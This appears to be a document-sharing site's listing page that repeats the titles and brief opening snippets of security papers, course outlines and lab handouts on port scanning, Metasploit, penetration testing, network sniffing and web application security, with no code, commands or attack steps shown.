Port Scanning. Objectives. Introduction: Port Scanning. 1. Introduce the techniques of port scanning. 2. Use port scanning audit tools such as Nmap.
Port Scanning Objectives 1. Introduce the techniques of port scanning. 2. Use port scanning audit tools such as Nmap. Introduction: All machines connected to a LAN or connected to Internet via a modem
Metasploit ing the target machine is a fascinating subject to all security professionals. The rich list of exploit codes and other handy modules of
Metasploit ing the target machine is a fascinating subject to all security professionals. The rich list of exploit codes and other handy modules of Metasploit Framework make the penetrators life quite
Penetration Testing: Lessons from the Field
Penetration Testing: Lessons from the Field CORE SECURITY TECHNOLOGIES SCS SERVICES May 2009 1 Agenda: About me: Alberto Soliño Director of Security Consulting Services at Core Security One of first five
Ethical Hacking and Information Security. Foundation of Information Security. Detailed Module. Duration. Lecture with Hands On Session: 90 Hours
Ethical Hacking and Information Security Duration Detailed Module Foundation of Information Security Lecture with Hands On Session: 90 Hours Elements of Information Security Introduction As technology
Attacking Automatic Wireless Network Selection. Dino A. Dai Zovi and Shane A. Macaulay {ddaizovi,smacaulay1}@bloomberg.com
Attacking Automatic Wireless Network Selection Dino A. Dai Zovi and Shane A. Macaulay {ddaizovi,smacaulay1}@bloomberg.com We made Slashdot! Hackers, Meet Microsoft "The random chatter of several hundred
1. LAB SNIFFING LAB ID: 10
H E R A LAB ID: 10 SNIFFING Sniffing in a switched network ARP Poisoning Analyzing a network traffic Extracting files from a network trace Stealing credentials Mapping/exploring network resources 1. LAB
Web App Security Audit Services
locuz.com Professional Services Web App Security Audit Services The unsecured world today Today, over 80% of attacks against a company s network come at the Application Layer not the Network or System
1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications
1. Introduction 2. Web Application 3. Components 4. Common Vulnerabilities 5. Improving security in Web applications 2 What does World Wide Web security mean? Webmasters=> confidence that their site won
Exploiting Transparent User Identification Systems
Exploiting Transparent User Identification Systems Wayne Murphy Benjamin Burns Version 1.0a 1 CONTENTS 1.0 Introduction... 3 1.1 Project Objectives... 3 2.0 Brief Summary of Findings... 4 3.0 Background
Evading Infrastructure Security Mohamed Bedewi Penetration Testing Consultant
Evading Infrastructure Security Mohamed Bedewi Penetration Testing Consultant What infrastructure security really means? Infrastructure Security is Making sure that your system services are always running
Web Application Hacking (Penetration Testing) 5-day Hands-On Course
Web Application Hacking (Penetration Testing) 5-day Hands-On Course Web Application Hacking (Penetration Testing) 5-day Hands-On Course Course Description Our web sites are under attack on a daily basis
Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh
Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP
